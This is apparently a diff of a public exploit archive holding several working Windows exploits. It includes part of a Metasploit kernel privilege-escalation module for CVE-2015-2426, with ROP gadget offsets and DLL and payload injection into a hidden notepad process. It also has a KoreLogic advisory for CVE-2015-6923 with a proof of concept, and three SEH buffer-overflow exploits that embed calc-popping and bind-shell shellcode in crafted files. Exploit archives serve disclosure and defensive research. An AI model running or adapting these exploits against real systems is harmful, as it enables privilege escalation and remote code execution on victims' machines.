'xchg_rax_rsp_adjust' => 0x17c78c, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
'chwnd_delete' => 0x146EE0 # CHwndTargetProp::Delete
}
when '6.3.9600.17694'
{
'info_leak' => 0x3d300,
'pop_rax_ret' => 0x151f4, # pop rax # ret # 58 C3
'xchg_rax_rsp' => 0x600c, # xchg eax, esp # ret # 94 C3
'allocate_pool' => 0x351220, # import entry nt!ExAllocatePoolWithTag
'pop_rcx_ret' => 0x2cf10, # pop rcx # ret # 59 C3
'deref_rax_into_rcx' => 0xc3757, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
'mov_rax_into_rcx' => 0xc375a, # mov [rcx], rax # ret # 48 89 01 C3
'pop_rbx_ret' => 0x6682, # pop rbx # ret # 5B C3
'ret' => 0x6683, # ret C3
'mov_rax_r11_ret' => 0x7010e, # mov rax, r11 # ret # 49 8B C3 C3
'add_rax_rcx_ret' => 0xecd7b, # add rax, rcx # ret # 48 03 C1 C3
'pop_rsp_ret' => 0x71380, # pop rsp # ret # 5c c3
'xchg_rax_rsp_adjust' => 0x178c84, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
'chwnd_delete' => 0x1513D8 # CHwndTargetProp::Delete
}
when '6.3.9600.17796'
{
'info_leak' => 0x3d000,
'pop_rax_ret' => 0x19e4f, # pop rax # ret # 58 C3
'xchg_rax_rsp' => 0x5f64, # xchg eax, esp # ret # 94 C3
'allocate_pool' => 0x352220, # import entry nt!ExAllocatePoolWithTag
'pop_rcx_ret' => 0x97a5e, # pop rcx # ret # 59 C3
'deref_rax_into_rcx' => 0xc3aa7, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
'mov_rax_into_rcx' => 0xc3aaa, # mov [rcx], rax # ret # 48 89 01 C3
'pop_rbx_ret' => 0x1B20, # pop rbx # ret # 5B C3
'ret' => 0x1B21, # ret C3
'mov_rax_r11_ret' => 0x7010e, # mov rax, r11 # ret # 49 8B C3 C3
'add_rax_rcx_ret' => 0xecf8b, # add rax, rcx # ret # 48 03 C1 C3
'pop_rsp_ret' => 0x29fd3, # pop rsp # ret # 5c c3
'xchg_rax_rsp_adjust' => 0x1789e4, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
'chwnd_delete' => 0x150F58 # CHwndTargetProp::Delete
}
when '6.3.9600.17837'
{
'info_leak' => 0x3d800,
'pop_rax_ret' => 0x1a51f, # pop rax # ret # 58 C3
'xchg_rax_rsp' => 0x62b4, # xchg eax, esp # ret # 94 C3
'allocate_pool' => 0x351220, # import entry nt!ExAllocatePoolWithTag
'pop_rcx_ret' => 0x97a4a, # pop rcx # ret # 59 C3
'deref_rax_into_rcx' => 0xc3687, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
'mov_rax_into_rcx' => 0xc368a, # mov [rcx], rax # ret # 48 89 01 C3
'pop_rbx_ret' => 0x14db, # pop rbx # ret # 5B C3
'ret' => 0x14dc, # ret C3
'mov_rax_r11_ret' => 0x94871, # mov rax, r11 # ret # 49 8B C3 C3
'add_rax_rcx_ret' => 0xecbdb, # add rax, rcx # ret # 48 03 C1 C3
'pop_rsp_ret' => 0xbd2c, # pop rsp # ret # 5c c3
'xchg_rax_rsp_adjust' => 0x15e84c, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
'chwnd_delete' => 0x15A470 # CHwndTargetProp::Delete
}
when '6.3.9600.17915'
{
'info_leak' => 0x3d800,
'pop_rax_ret' => 0x1A4EF, # pop rax # ret # 58 C3
'xchg_rax_rsp' => 0x62CC, # xchg eax, esp # ret # 94 C3
'allocate_pool' => 0x351220, # import entry nt!ExAllocatePoolWithTag
'pop_rcx_ret' => 0x9765A, # pop rcx # ret # 59 C3
'deref_rax_into_rcx' => 0xC364F, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
'mov_rax_into_rcx' => 0xC3652, # mov [rcx], rax # ret # 48 89 01 C3
'pop_rbx_ret' => 0x14DB, # pop rbx # ret # 5B C3
'ret' => 0x14DC, # ret # C3
'mov_rax_r11_ret' => 0x7060e, # mov rax, r11 # ret # 49 8B C3 C3
'add_rax_rcx_ret' => 0xECDCB, # add rax, rcx # 48 03 C1 C3
'pop_rsp_ret' => 0xbe33, # pop rsp # ret # 5c c3
'xchg_rax_rsp_adjust' => 0x15e5fc, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
'chwnd_delete' => 0x15A220 # CHwndTargetProp::Delete
}
else
nil
end
end.call(@win32k)
end
def patch_nt_offsets(dll)
@nt_offsets.each do |k, v|
case k
when 'set_cr4'
dll.gsub!([0xdeedbeefdeedbe0e].pack('Q<'), [v].pack('Q<'))
when 'allocate_pool_with_tag'
dll.gsub!([0xdeedbeefdeedbe0f].pack('Q<'), [v].pack('Q<'))
end
end
end
def set_nt_offsets
@nt_offsets ||= Proc.new do |version|
case version
when '6.3.9600.17415'
{
'set_cr4' => 0x38a3cc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
'allocate_pool_with_tag' => 0x2a3a50 # ExAllocatePoolWithTag
}
when '6.3.9600.17630'
{
'set_cr4' => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
'allocate_pool_with_tag' => 0x2A3A50 # ExAllocatePoolWithTag
}
when '6.3.9600.17668'
{
'set_cr4' => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
'allocate_pool_with_tag' => 0x2A3A50 # ExAllocatePoolWithTag
}
when '6.3.9600.17936'
{
'set_cr4' => 0x3863bc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
'allocate_pool_with_tag' => 0x29FA50 # ExAllocatePoolWithTag
}
else
nil
end
end.call(@ntoskrnl)
end
def atmfd_version
file_path = expand_path('%windir%') << '\\system32\\atmfd.dll'
major, minor, build, revision, branch = file_version(file_path)
return nil if major.nil?
ver = "#{major}.#{minor}.#{build}.#{revision}"
vprint_status("atmfd.dll file version: #{ver} branch: #{branch}")
ver
end
def win32k_version
file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
major, minor, build, revision, branch = file_version(file_path)
return nil if major.nil?
ver = "#{major}.#{minor}.#{build}.#{revision}"
vprint_status("win32k.sys file version: #{ver} branch: #{branch}")
ver
end
def ntoskrnl_version
file_path = expand_path('%windir%') << '\\system32\\ntoskrnl.exe'
major, minor, build, revision, branch = file_version(file_path)
return nil if major.nil?
ver = "#{major}.#{minor}.#{build}.#{revision}"
vprint_status("ntoskrnl.exe file version: #{ver} branch: #{branch}")
ver
end
def check
# We have tested only windows 8.1
if sysinfo['OS'] !~ /Windows 8/i
return Exploit::CheckCode::Unknown
end
# We have tested only 64 bits
if sysinfo['Architecture'] !~ /(wow|x)64/i
return Exploit::CheckCode::Unknown
end
atmfd = atmfd_version
# atmfd 5.1.2.238 => Works
unless atmfd && Gem::Version.new(atmfd) <= Gem::Version.new('5.1.2.243')
return Exploit::CheckCode::Safe
end
# win32k.sys 6.3.9600.17393 => Works
@win32k = win32k_version
unless @win32k && WIN32K_VERSIONS.include?(@win32k)
return Exploit::CheckCode::Detected
end
# ntoskrnl.exe 6.3.9600.17415 => Works
@ntoskrnl = ntoskrnl_version
unless @ntoskrnl && NT_VERSIONS.include?(@ntoskrnl)
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Appears
end
def exploit
print_status('Checking target...')
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
check_result = check
if check_result == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, 'Target not vulnerable')
end
if check_result == Exploit::CheckCode::Unknown
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
end
if check_result == Exploit::CheckCode::Detected
fail_with(Failure::NotVulnerable, 'ROP chain not available for the target nt/win32k')
end
unless get_target_arch == ARCH_X86_64
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
end
print_status("Exploiting with win32k #{@win32k} and nt #{@ntoskrnl}...")
set_win32k_offsets
fail_with(Failure::NoTarget, 'win32k.sys offsets not available') if @win32k_offsets.nil?
set_nt_offsets
fail_with(Failure::NoTarget, 'ntoskrnl.exe offsets not available') if @nt_offsets.nil?
begin
print_status('Launching notepad to host the exploit...')
notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
# Sandboxes could not allow to create a new process
# stdapi_sys_process_execute: Operation failed: Access is denied.
print_status('Operation failed. Trying to elevate the current process...')
process = client.sys.process.open
end
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-2426', 'reflective_dll.x64.dll')
library_path = ::File.expand_path(library_path)
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
dll = ''
::File.open(library_path, 'rb') { |f| dll = f.read }
patch_win32k_offsets(dll)
patch_nt_offsets(dll)
exploit_mem, offset = inject_dll_data_into_process(process, dll)
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(process, payload.encoded)
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status('Payload injected. Executing exploit...')
process.thread.create(exploit_mem + offset, payload_mem)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end

251
platforms/windows/dos/38225.txt Executable file
View file

@ -0,0 +1,251 @@
KL-001-2015-005 : VBox Satellite Express Arbitrary Write Privilege Escalation
Title: VBox Satellite Express Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2015-005
Publication Date: 2015.09.16
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-005.txt
1. Vulnerability Details
Affected Vendor: VBox Communications
Affected Product: Satellite Express Protocol
Affected Version: 2.3.17.3
Platform: Microsoft Windows XP SP3, Microsoft Windows 7 (x86)
CWE Classification: CWE-123: Write-what-where condition
Impact: Arbitrary Code Execution
Attack vector: IOCTL
CVE-ID: CVE-2015-6923
2. Vulnerability Description
A vulnerability within the ndvbs module allows an attacker
to inject memory they control into an arbitrary location they
define. This vulnerability can be used to overwrite function
pointers in HalDispatchTable resulting in an elevation of
privilege.
3. Technical Description
Example against Windows XP:
Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 2600.xpsp_sp3_qfe.101209-1646
Machine Name:
Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0
Debug session time: Tue Mar 10 18:57:54.259 2015 (UTC - 7:00)
System Uptime: 0 days 0:11:19.843
*********************************************************************
* *
* Bugcheck Analysis *
* *
*********************************************************************
Use !analyze -v to get detailed debugging information.
BugCheck 50, {b41c5d4c, 0, 805068e1, 0}
Probably caused by : ndvbs.sys ( ndvbs+94f )
Followup: MachineOwner
---------
kd> kn
Call stack: # ChildEBP RetAddr
00 f64fda98 8051cc7f nt!KeBugCheckEx+0x1b
01 f64fdaf8 805405d4 nt!MmAccessFault+0x8e7
02 f64fdaf8 805068e1 nt!KiTrap0E+0xcc
03 f64fdbb0 80506aae nt!MmMapLockedPagesSpecifyCache+0x211
04 f64fdbd0 f650e94f nt!MmMapLockedPages+0x18
05 f64fdc34 804ee129 ndvbs+0x94f
06 f64fdc44 80574e56 nt!IopfCallDriver+0x31
07 f64fdc58 80575d11 nt!IopSynchronousServiceTail+0x70
08 f64fdd00 8056e57c nt!IopXxxControlFile+0x5e7
09 f64fdd34 8053d6d8 nt!NtDeviceIoControlFile+0x2a
0a f64fdd34 7c90e514 nt!KiFastCallEntry+0xf8
0b 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet
0c 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc
0d 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a
0e 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866
0f 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88
10 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e
11 0021f6c0 1e07bd9c _ctypes+0x54d8
12 00000000 00000000 python27!PyObject_Call+0x4c
Example against Windows 7:
Microsoft (R) Windows Debugger Version 6.3.9600.17298 X86
Copyright (c) Microsoft Corporation. All rights reserved.
Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS Personal
Built by: 7601.17514.x86fre.win7sp1_rtm.101119-1850
Kernel base = 0x8280c000 PsLoadedModuleList = 0x82956850
Debug session time: Tue Sep 15 15:08:38.938 2015 (UTC - 7:00)
System Uptime: 0 days 0:27:26.358
kd> .symfix;.reload
Loading Kernel Symbols
...............................................................
................................................................
........................
Loading User Symbols
Loading unloaded module list
........
kd> !analyze -v
**********************************************************************
* *
* Bugcheck Analysis *
* *
**********************************************************************
KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e)
This is a very common bugcheck. Usually the exception address pinpoints
the driver/function that caused the problem. Always note this address
as well as the link date of the driver/image that contains this address.
Some common problems are exception code 0x80000003. This means a hard
coded breakpoint or assertion was hit, but this system was booted
/NODEBUG. This is not supposed to happen as developers should never have
hardcoded breakpoints in retail code, but ...
If this happens, make sure a debugger gets connected, and the
system is booted /DEBUG. This will let us see why this breakpoint is
happening.
Arguments:
Arg1: c0000005, The exception code that was not handled
Arg2: 929ef938, The address that the exception occurred at
Arg3: 974f4a34, Trap Frame
Arg4: 00000000
Debugging Details:
------------------
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx
referenced memory at 0x%08lx. The memory could not be %s.
FAULTING_IP:
ndvbs+938
929ef938 8b4604 mov eax,dword ptr [esi+4]
TRAP_FRAME: 974f4a34 -- (.trap 0xffffffff974f4a34)
ErrCode = 00000000
eax=00000000 ebx=85490880 ecx=85de2ae0 edx=85490810 esi=85490810 edi=8460a668
eip=929ef938 esp=974f4aa8 ebp=974f4afc iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
ndvbs+0x938:
929ef938 8b4604 mov eax,dword ptr [esi+4]
Resetting default scope
CUSTOMER_CRASH_COUNT: 1
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x8E
PROCESS_NAME: python.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) x86fre
LAST_CONTROL_TRANSFER: from 82843593 to 929ef938
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
974f4afc 82843593 85de2a28 85490810 85490810 ndvbs+0x938
974f4b14 82a3799f 8460a668 85490810 85490880 nt!IofCallDriver+0x63
974f4b34 82a3ab71 85de2a28 8460a668 00000000 nt!IopSynchronousServiceTail+0x1f8
974f4bd0 82a813f4 85de2a28 85490810 00000000 nt!IopXxxControlFile+0x6aa
974f4c04 8284a1ea 00000078 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
974f4c04 76fa70b4 00000078 00000000 00000000 nt!KiFastCallEntry+0x12a
0021f99c 00000000 00000000 00000000 00000000 0x76fa70b4
STACK_COMMAND: kb
FOLLOWUP_IP:
ndvbs+938
929ef938 8b4604 mov eax,dword ptr [esi+4]
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: ndvbs+938
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: ndvbs
IMAGE_NAME: ndvbs.sys
DEBUG_FLR_IMAGE_TIMESTAMP: 3ec77b36
BUCKET_ID: OLD_IMAGE_ndvbs.sys
FAILURE_BUCKET_ID: OLD_IMAGE_ndvbs.sys
ANALYSIS_SOURCE: KM
FAILURE_ID_HASH_STRING: km:old_image_ndvbs.sys
FAILURE_ID_HASH: {e5b892ba-cc2c-e4a4-9b6e-5e8b63660e75}
Followup: MachineOwner
---------
4. Mitigation and Remediation Recommendation
No response from vendor; no remediation available.
5. Credit
This vulnerability was discovered by Matt Bergin of KoreLogic
Security, Inc.
6. Disclosure Timeline
2015.05.19 - KoreLogic requests a security contact from
info@vboxcomm.com.
2015.05.29 - KoreLogic requests a security contact from
{info,sales,marketing}@vboxcomm.com.
2015.08.03 - 45 business days have elapsed since KoreLogic's last
contact attempt.
2015.09.11 - KoreLogic requests CVE from Mitre.
2015.09.12 - Mitre issues CVE-2015-6923.
2015.09.16 - Public disclosure.
7. Proof of Concept
from sys import exit
from ctypes import *
NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory
WriteProcessMemory = windll.kernel32.WriteProcessMemory
DeviceIoControl = windll.ntdll.NtDeviceIoControlFile
CreateFileA = windll.kernel32.CreateFileA
CloseHandle = windll.kernel32.CloseHandle
FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1
OPEN_EXISTING = 3
NULL = None
device = "ndvbs"
code = 0x00000ffd
inlen = 0x0
outlen = 0x0
inbuf = 0x1
outbuf = 0xffff0000
inBufMem = "\x90"*inlen
def main():
try:
handle = CreateFileA("\\\\.\\%s" %
(device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == -1):
print "[-] error creating handle"
exit(1)
except Exception as e:
print "[-] error creating handle"
exit(1)
#NtAllocateVirtualMemory(-1,byref(c_int(inbuf)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,inbuf,inlen,outbuf,outlen)
CloseHandle(handle)
return False
if __name__=="__main__":
main()
The contents of this advisory are copyright(c) 2015
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt

45
platforms/windows/local/38218.py Executable file
View file

@ -0,0 +1,45 @@
# Exploit Title: IKEView.exe R60 localSEH Exploit
# Date: 17/09/2015
# Exploit Author: cor3sm4sh3r
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/pub/shravan-kumar-ceh-oscp/103/414/450
# Category: Local
#[+] Gr337z: hyp3rlinx for finding the bug
#[+] Source:
#http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt
# exploit as been tested on win XP professional sp2
#Vendor:
#================================
#www.checkpoint.com
#http://pingtool.org/downloads/IKEView.exe
#!/usr/bin/env python
file="IKEView.elg"
x=open(file,"w")
nseh = "\x90\x90\xeb\x32" #short jump
seh = "\xc0\x28\x40\x00" #pop pop ret
nopsled = "\x90"*50
#badchars += "\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
buf = "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register
buf += "\x50" #=> PUSH EAX | Push EAX to have null-byte padding for "calc.exe"
buf += "\x68\x2E\x65\x78\x65" #=> PUSH ".exe" | Push The ASCII string to the stack
buf += "\x68\x63\x61\x6C\x63" #=> PUSH "calc" |
buf += "\x8B\xC4" #=> MOV EAX,ESP | Put a pointer to the ASCII string in EAX
buf += "\x6A\x01" #=> PUSH 1 | Push uCmdShow parameter to the stack
buf += "\x50" #=> PUSH EAX | Push the pointer to lpCmdLine to the stack
buf += "\xBB\x4d\x11\x86\x7C" #=> MOV EBX,7C86114d | Move the pointer to WinExec() into EBX
buf += "\xFF\xD3" #=> CALL EBX
buf += "\x33\xc0" #=> XOR EAX,EAX | Zero out EAX register
buf += "\x50" #=> PUSH EAX | Push EAX
buf += "\xBB\xa2\xca\x81\x7c" #=> MOV EBX,7C81caa2 | Exit process
buf += "\xFF\xD3" #=> CALL EBX
junk = "A"*(4424)
payload = junk + nseh + seh + nopsled + buf
x.write(payload)
x.close()

60
platforms/windows/local/38219.py Executable file
View file

@ -0,0 +1,60 @@
#!/usr/bin/python -w
# Title : ZTE PC UI USB MODEM SOFTWARE Buffer Overflow
# Date : 17/09/2015
# Author : R-73eN
# Tested on : Windows Xp sp3 on software Eagle Speed PCW_EAGLEALBp671A1V1.0.0B02
# Since all the PC UI based software shares the same source code they are all vulnerable.(Confirmed By ZTE)
# The problem exists into the import function at PhoneBook Menu which doesn't
# validate data and importing a malformed file leads to code execution.
#
# Triggering the Vulnerability
# run this python script which will save an evil.txt file.
# Open Eagle Speed, go to PhoneBook , click Import and select the evil.txt File
# A calculator Should pop up.
#
# Disclosure Timeline:
# [16/08/2015] - Vendor notified
# [18/08/2015] - Vendor Responded asking for more details
# [17/08/2015] - Vendor Responded that will not release a patch since the product is at end of life.
#
# Solution:
# Don't import unknown text file.
#
# Video - https://www.youtube.com/watch?v=jbv1L4TrHTY
#
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
shellcode = "" #msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x20\x3f"
shellcode += "\xba\x49\xc7\x99\xe5\xda\xd7\xd9\x74\x24\xf4\x5b\x29"
shellcode += "\xc9\xb1\x31\x83\xc3\x04\x31\x53\x0f\x03\x53\x46\x25"
shellcode += "\x6c\x19\xb0\x2b\x8f\xe2\x40\x4c\x19\x07\x71\x4c\x7d"
shellcode += "\x43\x21\x7c\xf5\x01\xcd\xf7\x5b\xb2\x46\x75\x74\xb5"
shellcode += "\xef\x30\xa2\xf8\xf0\x69\x96\x9b\x72\x70\xcb\x7b\x4b"
shellcode += "\xbb\x1e\x7d\x8c\xa6\xd3\x2f\x45\xac\x46\xc0\xe2\xf8"
shellcode += "\x5a\x6b\xb8\xed\xda\x88\x08\x0f\xca\x1e\x03\x56\xcc"
shellcode += "\xa1\xc0\xe2\x45\xba\x05\xce\x1c\x31\xfd\xa4\x9e\x93"
shellcode += "\xcc\x45\x0c\xda\xe1\xb7\x4c\x1a\xc5\x27\x3b\x52\x36"
shellcode += "\xd5\x3c\xa1\x45\x01\xc8\x32\xed\xc2\x6a\x9f\x0c\x06"
shellcode += "\xec\x54\x02\xe3\x7a\x32\x06\xf2\xaf\x48\x32\x7f\x4e"
shellcode += "\x9f\xb3\x3b\x75\x3b\x98\x98\x14\x1a\x44\x4e\x28\x7c"
shellcode += "\x27\x2f\x8c\xf6\xc5\x24\xbd\x54\x83\xbb\x33\xe3\xe1"
shellcode += "\xbc\x4b\xec\x55\xd5\x7a\x67\x3a\xa2\x82\xa2\x7f\x5c"
shellcode += "\xc9\xef\x29\xf5\x94\x65\x68\x98\x26\x50\xae\xa5\xa4"
shellcode += "\x51\x4e\x52\xb4\x13\x4b\x1e\x72\xcf\x21\x0f\x17\xef"
shellcode += "\x96\x30\x32\x8c\x79\xa3\xde\x7d\x1c\x43\x44\x82"
filename="evil.txt"
nSEH = "\xEB\x06\x90\x90"
SEH = "\xab\x11\x9f\x0f"
buffer = "A" * 3136 + nSEH + SEH + shellcode + "D" * (2856 - len(shellcode))
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
print "[+] Evil.txt created successfully [+]"

48
platforms/windows/local/38220.py Executable file
View file

@ -0,0 +1,48 @@
#!/usr/bin/python
# EXPLOIT TITLE: IKEView R60 Buffer overflow(SEH) Local Exploit
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: hyp3rlinx
# Date of Testing: 17th September 2015
# Download Link : https://www.exploit-db.com/apps/e74a3dcf9bd8a2dd05026532fbf9bb36-IKEView.exe
# Tested On : Windows XP Service Pack 2
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called key.elg
# Step 3: Open this file with IKEView.exe
# That should open a bind tcp port at 4444
# Step 4: Connect with netcat at port 4444
file = open('key.elg' , 'w');
# bad characters - \x09\x0a\x00\x0a\x0b\x0c\x0d\x0e\x0f\x20
buffer = "A"*4424 + "\xEB\x18\x90\x90" + "\xc0\x28\x40\x00" + "\x90" * 30
# msfvenom -p windows/shell_bind_tcp -b '\x09\x0a\x00\x0a\x0b\x0c\x0d\x0e\x0f\x20' -f c
buffer += ("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa3\x9f"
"\x17\x99\x83\xeb\xfc\xe2\xf4\x5f\x77\x95\x99\xa3\x9f\x77\x10"
"\x46\xae\xd7\xfd\x28\xcf\x27\x12\xf1\x93\x9c\xcb\xb7\x14\x65"
"\xb1\xac\x28\x5d\xbf\x92\x60\xbb\xa5\xc2\xe3\x15\xb5\x83\x5e"
"\xd8\x94\xa2\x58\xf5\x6b\xf1\xc8\x9c\xcb\xb3\x14\x5d\xa5\x28"
"\xd3\x06\xe1\x40\xd7\x16\x48\xf2\x14\x4e\xb9\xa2\x4c\x9c\xd0"
"\xbb\x7c\x2d\xd0\x28\xab\x9c\x98\x75\xae\xe8\x35\x62\x50\x1a"
"\x98\x64\xa7\xf7\xec\x55\x9c\x6a\x61\x98\xe2\x33\xec\x47\xc7"
"\x9c\xc1\x87\x9e\xc4\xff\x28\x93\x5c\x12\xfb\x83\x16\x4a\x28"
"\x9b\x9c\x98\x73\x16\x53\xbd\x87\xc4\x4c\xf8\xfa\xc5\x46\x66"
"\x43\xc0\x48\xc3\x28\x8d\xfc\x14\xfe\xf7\x24\xab\xa3\x9f\x7f"
"\xee\xd0\xad\x48\xcd\xcb\xd3\x60\xbf\xa4\x60\xc2\x21\x33\x9e"
"\x17\x99\x8a\x5b\x43\xc9\xcb\xb6\x97\xf2\xa3\x60\xc2\xf3\xab"
"\xc6\x47\x7b\x5e\xdf\x47\xd9\xf3\xf7\xfd\x96\x7c\x7f\xe8\x4c"
"\x34\xf7\x15\x99\xb2\xc3\x9e\x7f\xc9\x8f\x41\xce\xcb\x5d\xcc"
"\xae\xc4\x60\xc2\xce\xcb\x28\xfe\xa1\x5c\x60\xc2\xce\xcb\xeb"
"\xfb\xa2\x42\x60\xc2\xce\x34\xf7\x62\xf7\xee\xfe\xe8\x4c\xcb"
"\xfc\x7a\xfd\xa3\x16\xf4\xce\xf4\xc8\x26\x6f\xc9\x8d\x4e\xcf"
"\x41\x62\x71\x5e\xe7\xbb\x2b\x98\xa2\x12\x53\xbd\xb3\x59\x17"
"\xdd\xf7\xcf\x41\xcf\xf5\xd9\x41\xd7\xf5\xc9\x44\xcf\xcb\xe6"
"\xdb\xa6\x25\x60\xc2\x10\x43\xd1\x41\xdf\x5c\xaf\x7f\x91\x24"
"\x82\x77\x66\x76\x24\xe7\x2c\x01\xc9\x7f\x3f\x36\x22\x8a\x66"
"\x76\xa3\x11\xe5\xa9\x1f\xec\x79\xd6\x9a\xac\xde\xb0\xed\x78"
"\xf3\xa3\xcc\xe8\x4c")
file.write(buffer)
file.close()